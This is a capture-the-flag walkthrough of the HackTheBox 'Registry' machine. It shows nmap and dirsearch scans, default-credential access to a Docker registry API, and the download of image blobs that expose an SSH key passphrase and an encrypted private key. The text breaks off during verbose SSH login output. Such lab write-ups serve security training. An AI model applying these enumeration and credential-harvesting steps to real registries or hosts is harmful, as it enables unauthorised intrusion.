HackTheBox - Registry 🧰🗂️

Quick Summary

→ My very first Hard box is now retired. A machine where you can exploit if you know what the technology is used. The initial scan has give me a big hint that this machine is using Docker and 3rd party server named REGISTRY Server.
And in the server there’s a lot container which I downloaded and find an SSH Key to get in to the machine and get the user.txt.
On my Privilege Escalation to the box’ I found out that I need to do lateral movement to the www-data shell which basically the webserver. From that, user can abuse SUDOERS rights by running the Restic and create a backup for root directory to my Kali Linux machine and get the shell and root.txt.

---

Penetration Testing Methodologies

1. Network Scanning

   → Nmap scan

   → discover open ports and what services are running

2. Enumeration

   → Browsing the HTTP Service

   → put the commonName in /etc/hosts/ file that appear on the Nmap Scan

   → Download and analyze the install file

   → Visit the docker.registry.htb and Look for interesting stuff in a Docker API

3. Post - Exploitation

   → Enumerating the Docker API by following this method

   → Found the docker repository that contains image called bolt-image

   → Found the some blobs file from latest

   → Download all the blob files and try to look for a password or ssh key

   → Get in to the Registry machine

4. Exploitation

   → Enumerate the Bolt CMS Website

   → using LinPEAS i found a hash that I can use for password of the website

   → Looking at configuration I modify the config.yml and upload 2 webshells as fast as I can to gain www-data shell.

5. Privilege Escalation

   → Abuse what www-data allowed to run which is the restic

   → create snapshot on my Kali linux machine which will be the backup server for restic

   → do reverse SSH in bolt user shell

   → run the restic on www-data and backup the root directory that will transfer into my machine.

   → get the id_rsa key on ssh folder, and login as root.

   → Finally rooted and got the root.txt

---

Network Scanning

Walkthrough

→ First, I run the NMAP to scan the target and get information about the various services that are running on the target machine. I use

---

• -sV ⇒ Probe open ports to determine service/version info
• -sC ⇒ equivalent to —script=default
• -T 0-5 ⇒ Set timing template - higher is faster (less accurate)
• -p- ⇒ Scan all 65535 ports
• -oN ⇒ to save our scan results to a text file

---

# bash

nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry

---

# bash

root in htb/boxes/Registry 
❯ nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-04 06:26 PST
Warning: 10.10.10.159 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.159
Host is up (0.25s latency).
Not shown: 65458 closed ports, 74 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
|   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp  open  http     nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after:  2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1218.67 seconds

root in htb/boxes/Registry took 20m19s 
❯

---

Nmap results

So there’s port open.

• 22 ⇒ which basically use for SSH Connections
• 80 ⇒ which basically running HTTP Service
• 443 ⇒ which running also HTTP/S and have ssl-cert – commonName=docker.registry.htb, I added that on my hosts file.

---

---

Enumeration

So I always visit first the HTTP service because that is a website and I got default page of a Nginx Server.

There’s no hint for that so i try enumerate the website using dirsearch Web path scanner to look for website page or items which can give me a hints.

Bruteforce Web directories

# bash

root in htb/boxes/Registry 
❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.159/" -e asd -t 20 --simple-report=registry-directories

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109

Error Log: /opt/dirsearch/logs/errors-20-04-04_07-13-49.log

Target: http://10.10.10.159/

[07:13:49] Starting: 
[07:13:51] 400 -  182B  - /%2e%2e/google.com
[07:13:51] 403 -  580B  - /.bash_history  
[07:13:53] 403 -  580B  - /.ht_wsr.txt                              
[07:13:53] 403 -  580B  - /.hta
[07:13:53] 403 -  580B  - /.htaccess-dev
[07:13:53] 403 -  580B  - /.htaccess-local
[07:13:53] 403 -  580B  - /.htaccess-marco
[07:13:53] 403 -  580B  - /.htaccess.BAK
[07:13:53] 403 -  580B  - /.htaccess.bak1
[07:13:53] 403 -  580B  - /.htaccess.old
[07:13:53] 403 -  580B  - /.htaccess.orig
[07:13:53] 403 -  580B  - /.htaccess.sample
[07:13:53] 403 -  580B  - /.htaccess.txt
[07:13:53] 403 -  580B  - /.htaccess.save
[07:13:53] 403 -  580B  - /.htaccess_extra
[07:13:53] 403 -  580B  - /.htaccess_orig
[07:13:53] 403 -  580B  - /.htaccess_sc
[07:13:53] 403 -  580B  - /.htaccessBAK
[07:13:53] 403 -  580B  - /.htaccessOLD
[07:13:53] 403 -  580B  - /.htaccessOLD2
[07:13:53] 403 -  580B  - /.htaccess~
[07:13:53] 403 -  580B  - /.htgroup
[07:13:53] 403 -  580B  - /.htpasswd-old
[07:13:53] 403 -  580B  - /.htpasswd_test
[07:13:53] 403 -  580B  - /.htpasswds
[07:13:53] 403 -  580B  - /.htusers
[07:14:05] 403 -  580B  - /admin/.htaccess                                       
[07:14:13] 403 -  580B  - /administrator/.htaccess                                                          
[07:14:17] 403 -  580B  - /app/.htaccess                                                                          
[07:14:44] 200 -  612B  - /index.html                                                                          
[07:14:45] 301 -  194B  - /install  ->  http://10.10.10.159/install/
[07:14:45] 200 -    1KB - /install/         
                                                                                                                  
Task Completed

root in htb/boxes/Registry took 2m4s 
❯ 

Get install file

I only got one which is the install when I added it into the URL it is 404 Page Not found.

but I manage to download the install using wget

# bash

root in htb/boxes/Registry 
❯ wget http://10.10.10.159/install
--2020-04-04 07:27:30--  http://10.10.10.159/install
Connecting to 10.10.10.159:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://10.10.10.159/install/ [following]
--2020-04-04 07:27:30--  http://10.10.10.159/install/
Reusing existing connection to 10.10.10.159:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘install’

install                                            [ <=>                                                                                                ]   1.03K  --.-KB/s    in 0s      

2020-04-04 07:27:31 (81.5 MB/s) - ‘install’ saved [1050]


root in htb/boxes/Registry 
❯

So I thought this was only ordinary a text file but it’s not, is a gzip file so I tried to move into a gzip and decompressed but it’s not working, and I don’t whats wrong so I move on and go the the next phase.

# bash

root in htb/boxes/Registry 
❯ file install
install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200

Explore Docker Registry

Next, i visited the docker.registry.htb and there will be a popup login requesting for username and password, I input admin:admin on that and it’s displaying a JSON API page.

and the JSON API

---

Post - Exploitation

Next, I search for Docker api registry exploitation and I didn’t failed. I found this awesome article which help me to get a password for SSH Key by exploring each blobs file.

So based on the method of the article, I look first at the /v2/_catalog and there’s a docker repository called "bolt-image" and it is basically a collection of related images.

Diving the Docker Repository

Next I added /tags/list and there was repository install called latest

trying to look at the /manifest/v2

To download the file latest I added simply this in the url /manifest/latest.

Open this file and we will see a lot of blobSum does have the latest repository in a Docker registry. Each of them will contains some info like password, files, ssh key etc.

Here are some blobs from latest.

# bash

root in htb/boxes/Registry 
❯ cat latest

{
   "schemaVersion": 1,
   "name": "bolt-image",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
      },
      {
         "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
      },
      {
         "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
      },
      {
         "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
      },
      {
         "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
      },
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
      },
      {
         "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
      },
      {
         "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
      },
      {
         "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
      }
   ],
   "history": [
      {
         "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
      },
      {
         "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
      },
      {
         "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
      },
      {
         "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
      },
      {
         "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
      },
      {
         "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop)  CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}"
      },
      {
         "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}"
      },
      {
         "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}"
      },
      {
         "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
      },
      {
         "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
      }
   ],
   "signatures": [
      {
         "header": {
            "jwk": {
               "crv": "P-256",
               "kid": "VUEK:AQ5E:PKKZ:YK3J:YU44:72EU:GB57:BMI2:QMIK:DZEH:73WL:Q7BY",
               "kty": "EC",
               "x": "yS0jBSmoO13WXoTRXRcp_OsqPZ3-ttTv3biBxexcyCo",
               "y": "JpwUWLV6IwW720h8XgeRpCvPoeZ_f8I82qIprZvEgm4"
            },
            "alg": "ES256"
         },
         "signature": "9E2loVJqpUIUj3EnEIrSKzOWaHvHKEsdAgcPX8sr152QKzWw3J7SgwLOnXPaJWegHyjYjTDnsNyEauNF8_J2SA",
         "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMC0wNC0wNFQwMDoyNzo1MVoifQ"
      }
   ]
}

Exploring the blobSums

So I need to explore each blobSum, i will download each using wget and look for interesting stuffs. so:

# bash

root in htb/boxes/Registry 
❯ wget --no-check-certificate --http-user=admin --http-password=admin https://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
--2020-04-04 08:38:15--  https://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159
Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected.
WARNING: The certificate of ‘docker.registry.htb’ is not trusted.
WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer.
HTTP request sent, awaiting response... 401 Unauthorized
Authentication selected: Basic realm="Registry"
Reusing existing connection to docker.registry.htb:443.
HTTP request sent, awaiting response... 200 OK
Length: 335 [application/octet-stream]
Saving to: ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’

sha256:302bfcb3f10c386a25a58913917257bd2fe7721 100%[===================================================================================================>]     335  --.-KB/s    in 0s      

2020-04-04 08:38:16 (250 MB/s) - ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’ saved [335/335]


root in htb/boxes/Registry 
❯ ls
install  install.gz  latest  nmap-Registry  registry-directories  sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b

Then i will moved it to into .gz file and decompressed it.

# bash

# move to .gz file
root in htb/boxes/Registry 
❯ mv sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz

# decompressed with gunzip
root in htb/boxes/Registry 
❯ gunzip sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz

Finally i can now read whats is on the first blob.

# bash

root in htb/boxes/Registry 
❯ cat sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b 
etc/0040755000000000000000000000000013472256035010032 5ustar0000000000000000etc/profile.d/0040755000000000000000000000000013472256264011720 5ustar0000000000000000etc/profile.d/01-ssh.sh0100755000000000000000000000033613472067523013267 0ustar0000000000000000#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
etc/profile.d/.wh.02-ssh.sh0000600000000000000000000000000013472256232013730 0ustar0000000000000000
root in htb/boxes/Registry 
❯ 

Base on the first blob i download it looks like the "GkOcz221Ftb3ugog" is a password for SSH Key but I don’t have the id_rsa which is needed as from this line.

# bash

expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"

Hunting the Private key

So i need more blobSum to get the id_rsa key, the 2nd blob was empty. and thid blob looks interesting this one is 100 mb total of files so:

# bash

root in boxes/Registry/docker 
❯ wget --no-check-certificate --http-user=admin --http-password=admin https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791
--2020-04-04 09:03:19--  https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791
Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159
Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected.
WARNING: The certificate of ‘docker.registry.htb’ is not trusted.
WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer.
HTTP request sent, awaiting response... 401 Unauthorized
Authentication selected: Basic realm="Registry"
Reusing existing connection to docker.registry.htb:443.
HTTP request sent, awaiting response... 200 OK
Length: 104569678 (100M) [application/octet-stream]
Saving to: ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’

sha256:2931a8b44e495489fdbe2bccd7232e99b182034 100%[===================================================================================================>]  99.72M   752KB/s    in 2m 56s

2020-04-04 09:06:16 (580 KB/s) - ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’ saved [104569678/104569678]


root in boxes/Registry/docker took 2m57s 
❯

Get in into the REGISTRY

after the download finished I explore the /root directory which contains the .ssh directory which has id_rsa and config file.

I look first at the config file and the user for SSH is bolt

# bash

Host registry
  User bolt
  Port 22
  Hostname registry.htb

root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh

and the RSA Key

# bash

root in boxes/Registry/docker
❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9

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
Bdtfi9goJBFb6P7yHapZ13W30b96ZQG4Gdf4ZeV6MPMizcTbiggZRBokZLCBMb5H
pgkPgTrGJlbm+sLu/kt4jgex3T/NWwXHVrny5kIuTbbv1fXfyfkPqU66eysstO2s
OxciNk4W41o9YqHHYM9D/uL6xMqO3K/LTYUI+LcCK13pkjP7/zH+bqiClfNt0D2B
Xg6OWYK7E/DTqX+7zqNQp726sDAYKqQNpwgHldyDhOG3i8o66mLj3xODHQzBvwKR
bJ7jrLPW+AmQwo/V8ElNFPyP6oZBEdoNVn/plMDAi0ZzBHJc7hJ0JuHnMggWFXBM
PjxG/w4c8XV/Y2WavafEjT7hHuviSo6phoED5Zb3Iu+BU+qoEaNM/LntDwBXNEVu
Z0pIXd5Q2EloUZDXoeyMCqO/NkcIFkx+//BDddVTFmfw21v2Y8fZ2rivF/8CeXXZ
ot6kFb4G6gcxGpqSZKY7IHSp49I4kFsC7+tx7LU5/wqC9vZfuds/TM7Z+uECPOYI
f41H5YN+V14S5rU97re2w49vrBxM67K+x930niGVHnqk7t/T1jcErROrhMeT6go9
RLI9xScv6aJan6xHS+nWgxpPA7YNo2rknk/ZeUnWXSTLYyrC43dyPS4FvG8N0H1V
94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
-----END RSA PRIVATE KEY-----

root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh 
❯

I move the the id_rsa in my registry directory and do the SSH Login so:

# bash

root in htb/boxes/Registry 
❯ ssh -v -i id_rsa bolt@registry.htb
OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d  10 Sep 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to registry.htb [10.10.10.159] port 22.
debug1: Connection established.
debug1: identity file id_rsa type 0
debug1: identity file id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
debug1: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to registry.htb:22 as 'bolt'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:G1J5ek/T6KuCCT7Xp2IN1LUslRt24mhmhKUo/kWWVrs
debug1: Host 'registry.htb' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:5
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
debug1: SSH2_MSG_EXT_INFO received
